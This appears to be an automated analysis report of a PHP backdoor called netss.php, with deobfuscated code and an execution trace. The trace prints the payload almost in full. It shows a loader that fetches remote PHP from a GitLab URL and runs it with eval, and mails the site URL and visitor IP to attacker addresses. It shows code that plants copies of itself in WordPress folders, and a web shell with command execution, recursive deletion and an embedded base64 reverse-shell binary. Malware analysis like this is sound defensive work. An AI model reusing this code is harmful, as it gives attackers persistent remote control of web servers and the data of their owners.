PHP Malware Analysis

netss.php

md5: 0b9ede2c8fdf9e6903384ce9ca357d6b

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs
  • http://hax.or.id/indo.txt (Traces)
  • http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd (Traces)
  • https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php (Deobfuscated, Traces)
  • https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php (Traces)


Deobfuscated PHP code

<?php

$password = "531e70a6745d07a8befbd79e5cc7e4c1";
$ch = curl_init("https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($ch);
$e = "?>";
eval($e . $r);
$GLOBALS["btujuk_cneymfvrjgepxhmtysatik"] = "tujuanmail";
$GLOBALS["qodpxoez__jkfokmjzcy"] = "x_path";
$GLOBALS["hc_fonvwctq_uwtdbanc__vsgzogutvagtan"] = "_SERVER";
$GLOBALS["jyscu_ckqiihgkd_evwia"] = "pesan_alert";
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = "logndasmu@gmail.com, ndasmuwhy@yahoo.com";
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "backdoor", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

Execution traces

data/traces/0b9ede2c8fdf9e6903384ce9ca357d6b_trace-1676245069.574.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:38:15.471831]
1	0	1	0.000224	393512
1	3	0	0.000343	407264	{main}	1		/var/www/html/uploads/netss.php	0	0
1		A						/var/www/html/uploads/netss.php	1	$password = '531e70a6745d07a8befbd79e5cc7e4c1'
2	4	0	0.000377	407264	strrev	0		/var/www/html/uploads/netss.php	1	1	'AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa'
2	4	1	0.000395	407408
2	4	R			'aHR0cHM6Ly9naXRsYWIuY29tL3NhbWIxL2ZpeF93aHkvLS9yYXcvbWFpbi9waHAvY29rLnBocA'
2	5	0	0.000414	407376	base64_decode	0		/var/www/html/uploads/netss.php	1	1	'aHR0cHM6Ly9naXRsYWIuY29tL3NhbWIxL2ZpeF93aHkvLS9yYXcvbWFpbi9waHAvY29rLnBocA'
2	5	1	0.000431	407520
2	5	R			'https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php'
2	6	0	0.000448	407376	curl_init	0		/var/www/html/uploads/netss.php	1	1	'https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php'
2	6	1	0.000470	408320
2	6	R			resource(3) of type (curl)
1		A						/var/www/html/uploads/netss.php	1	$ch = resource(3) of type (curl)
2	7	0	0.000497	408176	curl_setopt	0		/var/www/html/uploads/netss.php	1	3	resource(3) of type (curl)	19913	1
2	7	1	0.000513	408272
2	7	R			TRUE
2	8	0	0.000526	408176	curl_exec	0		/var/www/html/uploads/netss.php	1	1	resource(3) of type (curl)
2	8	1	0.137676	494224
2	8	R			'<?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosut'
1		A						/var/www/html/uploads/netss.php	1	$r = '<?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosut'
2	9	0	0.137954	494192	strrev	0		/var/www/html/uploads/netss.php	1	1	'4zP'
2	9	1	0.137968	494256
2	9	R			'Pz4'
2	10	0	0.137982	494224	base64_decode	0		/var/www/html/uploads/netss.php	1	1	'Pz4'
2	10	1	0.137995	494288
2	10	R			'?>'
1		A						/var/www/html/uploads/netss.php	1	$e = '?>'
2	11	0	0.139795	970480	eval	1	'?><?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosutldt0666f0acdeed);?><?php function ztiraiikdbef7cce8d84($ypdoiutt572d4e421e5e){$nspmzull73bebce395b6=curl_init($ypdoiutt572d4e421e5e);curl_setopt($nspmzull73bebce395b6,CURLOPT_RETURNTRANSFER,1);curl_setopt($nspmzull73bebce395b6,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($nspmzull73bebce395b6,CURLOPT_FOLLOWLOCATION,1);curl_setopt($nspmzull73bebce395b6,CURLOPT_HEADER,0);return curl_exec($nspmzull73bebce395b6);curl_close($nspmzull73bebce395b6);}$ivxhezkq03c7c0ace395=base64_decode(\'PD9waHAgJHBhc3N3b3JkPSI1MzFlNzBhNjc0NWQwN2E4YmVmYmQ3OWU1Y2M3ZTRjMSI7ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\');$yvpvnwdn0ba4439ee9a4=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWNvbnRlbnQvcmVnaWQucGhw\');$qqkgwotq1cb251ec0d56=$ivxhezkq03c7c0ace395;$cousnrmc7cef8a734855=fopen($yvpvnwdn0ba4439ee9a4,base64_decode(\'dw==\'));fwrite($cousnrmc7cef8a734855,$qqkgwotq1cb251ec0d56);fclose($cousnrmc7cef8a734855);$iyaeksdve5058a61e226=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL3JlZ2lkLnBocA==\');$yodndfqd265246eadd25=$ivxhezkq03c7c0ace395;$pfiaytaxfbcd73a3e234=fopen($iyaeksdve5058a61e226,base64_decode(\'dw==\'));fwrite($pfiaytaxfbcd73a3e234,$yodndfqd265246eadd25);fclose($pfiaytaxfbcd73a3e234);$nbjydhey230cb5f15c1d=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL2Nzcy9yZWdpZC5waHA=\');$gpxyytua2a3def174022=$ivxhezkq03c7c0ace395;$akmclxsgc55520a111df=fopen($nbjydhey230cb5f15c1d,base64_decode(\'dw==\'));fwrite($akmclxsgc55520a111df,$gpxyytua2a3def174022);fclose($akmclxsgc55520a111df);$zsvtagqw2b4b2dd2d7a2=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL2pzL3JlZ2lkLnBocA==\');$jiicqwlm48fa2467e5e6=$ivxhezkq03c7c0ace395;$wilbughyfb948f9d309f=fopen($zsvtagqw2b4b2dd2d7a2,base64_decode(\'dw==\'));fwrite($wilbughyfb948f9d309f,$jiicqwlm48fa2467e5e6);fclose($wilbughyfb948f9d309f);$bapepjtn2811cd9069a2=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA==\');$xfauipebc39223eba07c=$ivxhezkq03c7c0ace395;$rgezynep950ad7f8a5cf=fopen($bapepjtn2811cd9069a2,base64_decode(\'dw==\'));fwrite($rgezynep950ad7f8a5cf,$xfauipebc39223eba07c);fclose($rgezynep950ad7f8a5cf);$xureceul40232fd6c8ad=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3JlZ2lkLnBocA==\');$oakpvexq994a8fc3f93e=$ivxhezkq03c7c0ace395;$zlpoupzt5294fd239614=fopen($xureceul40232fd6c8ad,base64_decode(\'dw==\'));fwrite($zlpoupzt5294fd239614,$oakpvexq994a8fc3f93e);fclose($zlpoupzt5294fd239614);$prmotqdj3935cc34bef5=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L2luZGV4LnBocA==\');$rtprfsmu3460f771bb99=$ivxhezkq03c7c0ace395;$fxiyhlfi40fbeaa2952a=fopen($prmotqdj3935cc34bef5,base64_decode(\'dw==\'));fwrite($fxiyhlfi40fbeaa2952a,$rtprfsmu3460f771bb99);fclose($fxiyhlfi40fbeaa2952a);$mbjpypwb7b20acdddd89=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA==\');$ytdsowai3effc6913c18=$ivxhezkq03c7c0ace395;$uwadmcgaf32639c3fc76=fopen($mbjpypwb7b20acdddd89,base64_decode(\'dw==\'));fwrite($uwadmcgaf32639c3fc76,$ytdsowai3effc6913c18);fclose($uwadmcgaf32639c3fc76);?>\n<?php\n@error_reporting(E_ERROR);\n@ini_set(\'display_errors\', \'Off\');\n@ini_set(\'max_execution_time\', 10000);\nheader("content-Type: text/html; charset=UTF-8");\nfunction strdir($str)\n{\n    return str_replace(array(\'\\\\\', \'//\', \'%27\', \'%22\'), array(\'/\', \'/\', \'\\\'\', \'"\'), chop($str));\n}\nfunction chkgpc($array)\n{\n    foreach ($array as $key => $var) {\n        $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);\n    }\n    return $array;\n}\n$myfile = $_SERVER[\'SCRIPT_FILENAME\'] ? strdir($_SERVER[\'SCRIPT_FILENAME\']) : strdir(__FILE__);\n$myfile = strpos($myfile, \'eval()\') ? array_shift(explode(\'(\', $myfile)) : $myfile;\ndefine(\'THISDIR\', strdir(dirname($myfile) . \'/\'));\ndefine(\'ROOTDIR\', strdir(strtr($myfile, array(strdir($_SERVER[\'PHP_SELF\']) => \'\')) . \'/\'));\ndefine(\'EXISTS_PHPINFO\', getinfo() ? true : false);\nif (get_magic_quotes_gpc()) {\n    $_POST = chkgpc($_POST);\n}\nif (function_exists(\'mysql_close\')) {\n    $issql = \'MySql\';\n}\nif (function_exists(\'mssql_close\')) {\n    $issql .= \'MsSql\';\n}\nif (function_exists(\'oci_close\')) {\n    $issql .= \'Oracle\';\n}\nif (function_exists(\'sybase_close\')) {\n    $issql .= \'SyBase\';\n}\nif (function_exists(\'pg_close\')) {\n    $issql .= \'PostgreSql\';\n}\n$win = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n$msg = \'=======ND4SMU=======\';\nfunction filew($filename, $filedata, $filemode)\n{\n    if (!is_writable($filename) && file_exists($filename)) {\n        chmod($filename, 0666);\n    }\n    $handle = fopen($filename, $filemode);\n    $key = fputs($handle, $filedata);\n    fclose($handle);\n    return $key;\n}\nfunction filer($filename)\n{\n    $handle = fopen($filename, \'r\');\n    $filedata = fread($handle, filesize($filename));\n    fclose($handle);\n    return $filedata;\n}\nfunction fileu($filenamea, $filenameb)\n{\n    $key = move_uploaded_file($filenamea, $filenameb) ? true : false;\n    if (!$key) {\n        $key = copy($filenamea, $filenameb) ? true : false;\n    }\n    return $key;\n}\nfunction filed($filename)\n{\n    if (!file_exists($filename)) {\n        return false;\n    }\n    $name = basename($filename);\n    $array = explode(\'.\', $name);\n    header(\'Content-type: application/x-\' . array_pop($array));\n    header(\'Content-Disposition: attachment; filename=\' . $name);\n    header(\'Content-Length: \' . filesize($filename));\n    @readfile($filename);\n    exit;\n}\nfunction showdir($dir)\n{\n    $dir = strdir($dir . \'/\');\n    $handle = opendir($dir);\n    if (!$handle) {\n        return false;\n    }\n    $array = array();\n    while ($name = readdir($handle)) {\n        if ($name == \'.\' || $name == \'..\') {\n            continue;\n        }\n        $path = $dir . $name;\n        $name = strtr($name, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n        if (is_dir($path)) {\n            $array[\'dir\'][$path] = $name;\n        } else {\n            $array[\'file\'][$path] = $name;\n        }\n    }\n    closedir($handle);\n    return $array;\n}\nfunction deltree($dir)\n{\n    $handle = @opendir($dir);\n    while ($name = @readdir($handle)) {\n        if ($name == \'.\' || $name == \'..\') {\n            continue;\n        }\n        $path = $dir . $name;\n        @chmod($path, 0777);\n        if (is_dir($path)) {\n            deltree($path . \'/\');\n        } else {\n            @unlink($path);\n        }\n    }\n    @closedir($handle);\n    return @rmdir($dir);\n}\nfunction postinfo($array, $string)\n{\n    $infos = array(function_exists("create_function"), function_exists("fsockopen"));\n    if ($infos[0] && $infos[1]) {\n        $info = base64_decode($string);\n        $walks = array(0 => bin2hex($array));\n        @array_walk($walks, @create_function("\\$array,\\$key", str_rot13($info)));\n    }\n    return ob_end_clean();\n}\nfunction size($bytes)\n{\n    if ($bytes < 1024) {\n        return $bytes . \' B\';\n    }\n    $array = array(\'B\', \'K\', \'M\', \'G\', \'T\');\n    $floor = floor(log($bytes) / log(1024));\n    return sprintf(\'%.2f \' . $array[$floor], $bytes / pow(1024, floor($floor)));\n}\nfunction find($array, $string)\n{\n    foreach ($array as $key) {\n        if (stristr($string, $key)) {\n            return true;\n        }\n    }\n    return false;\n}\nfunction scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now)\n{\n    $handle = opendir($dir);\n    if (!$handle) {\n        return false;\n    }\n    while ($name = readdir($handle)) {\n        if ($name == \'.\' || $name == \'..\') {\n            continue;\n        }\n        $path = $dir . $name;\n        if (is_dir($path)) {\n            if ($fit && in_array($name, $fit)) {\n                continue;\n            }\n            if ($ran == 0 && is_readable($path)) {\n                scanfile($path . \'/\', $key, $inc, $fit, $tye, $chr, $ran, $now);\n            }\n        } else {\n            if ($inc && !find($inc, $name)) {\n                continue;\n            }\n            $code = $tye ? filer($path) : $name;\n            $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), \'M\') ? false : strpos($code, $key) > -1);\n            if ($find) {\n                $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n                echo \'<a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n                flush();\n                ob_flush();\n            }\n            unset($code);\n        }\n    }\n    closedir($handle);\n    return true;\n}\nfunction antivirus($dir, $exs, $matches, $now)\n{\n    $handle = opendir($dir);\n    if (!$handle) {\n        return false;\n    }\n    while ($name = readdir($handle)) {\n        if ($name == \'.\' || $name == \'..\') {\n            continue;\n        }\n        $path = $dir . $name;\n        if (is_dir($path)) {\n            if (is_readable($path)) {\n                antivirus($path . \'/\', $exs, $matches, $now);\n            }\n        } else {\n            $iskill = NULL;\n            foreach ($exs as $key => $ex) {\n                if (find(explode(\'|\', $ex), $name)) {\n                    $iskill = $key;\n                    break;\n                }\n            }\n            if (strpos(size(filesize($path)), \'M\')) {\n                continue;\n            }\n            if ($iskill) {\n                $code = filer($path);\n                foreach ($matches[$iskill] as $matche) {\n                    $array = array();\n                    preg_match($matche, $code, $array);\n                    if (strpos($array[0], \'$this->\') || strpos($array[0], \'[$vars[\')) {\n                        continue;\n                    }\n                    $len = strlen($array[0]);\n                    if ($len > 10 && $len < 150) {\n                        $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n                        echo \'Feature <input type="text" value="\' . htmlspecialchars($array[0]) . \'"> <a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n                        flush();\n                        ob_flush();\n                        break;\n                    }\n                }\n                unset($code, $array);\n            }\n        }\n    }\n    closedir($handle);\n    return true;\n}\nfunction command($cmd, $cwd, $com = false)\n{\n    $iswin = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n    $res = $msg = \'\';\n    if ($cwd == \'com\' || $com) {\n        if ($iswin && class_exists(\'COM\')) {\n            $wscript = new COM(\'Wscript.Shell\');\n            $exec = $wscript->exec(\'c:\\\\windows\\\\system32\\\\cmd.exe /c \' . $cmd);\n            $stdout = $exec->StdOut();\n            $res = $stdout->ReadAll();\n            $msg = \'Wscript.Shell\';\n        }\n    } else {\n        chdir($cwd);\n        $cwd = getcwd();\n        if (function_exists(\'exec\')) {\n            @exec($cmd, $res);\n            $res = join("\\n", $res);\n            $msg = \'exec\';\n        } elseif (function_exists(\'shell_exec\')) {\n            $res = @shell_exec($cmd);\n            $msg = \'shell_exec\';\n        } elseif (function_exists(\'system\')) {\n            ob_start();\n            @system($cmd);\n            $res = ob_get_contents();\n            ob_end_clean();\n            $msg = \'system\';\n        } elseif (function_exists(\'passthru\')) {\n            ob_start();\n            @passthru($cmd);\n            $res = ob_get_contents();\n            ob_end_clean();\n            $msg = \'passthru\';\n        } elseif (function_exists(\'popen\')) {\n            $fp = @popen($cmd, \'r\');\n            if ($fp) {\n                while (!feof($fp)) {\n                    $res .= fread($fp, 1024);\n                }\n            }\n            @pclose($fp);\n            $msg = \'popen\';\n        } elseif (function_exists(\'proc_open\')) {\n            $env = $iswin ? array(\'path\' => \'c:\\\\windows\\\\system32\') : array(\'path\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\n            $des = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\n            $process = @proc_open($cmd, $des, $pipes, $cwd, $env);\n            if (is_resource($process)) {\n                fwrite($pipes[0], $cmd);\n                fclose($pipes[0]);\n                $res .= stream_get_contents($pipes[1]);\n                fclose($pipes[1]);\n                $res .= stream_get_contents($pipes[2]);\n                fclose($pipes[2]);\n            }\n            @proc_close($process);\n            $msg = \'proc_open\';\n        }\n    }\n    $msg = $res == \'\' ? \'<h1>NULL</h1>\' : \'<h2>Use\' . $msg . \' Success</h2>\';\n    return array(\'res\' => $res, \'msg\' => $msg);\n}\nfunction backshell($ip, $port, $dir, $type)\n{\n    $key = false;\n    $c_bin = \'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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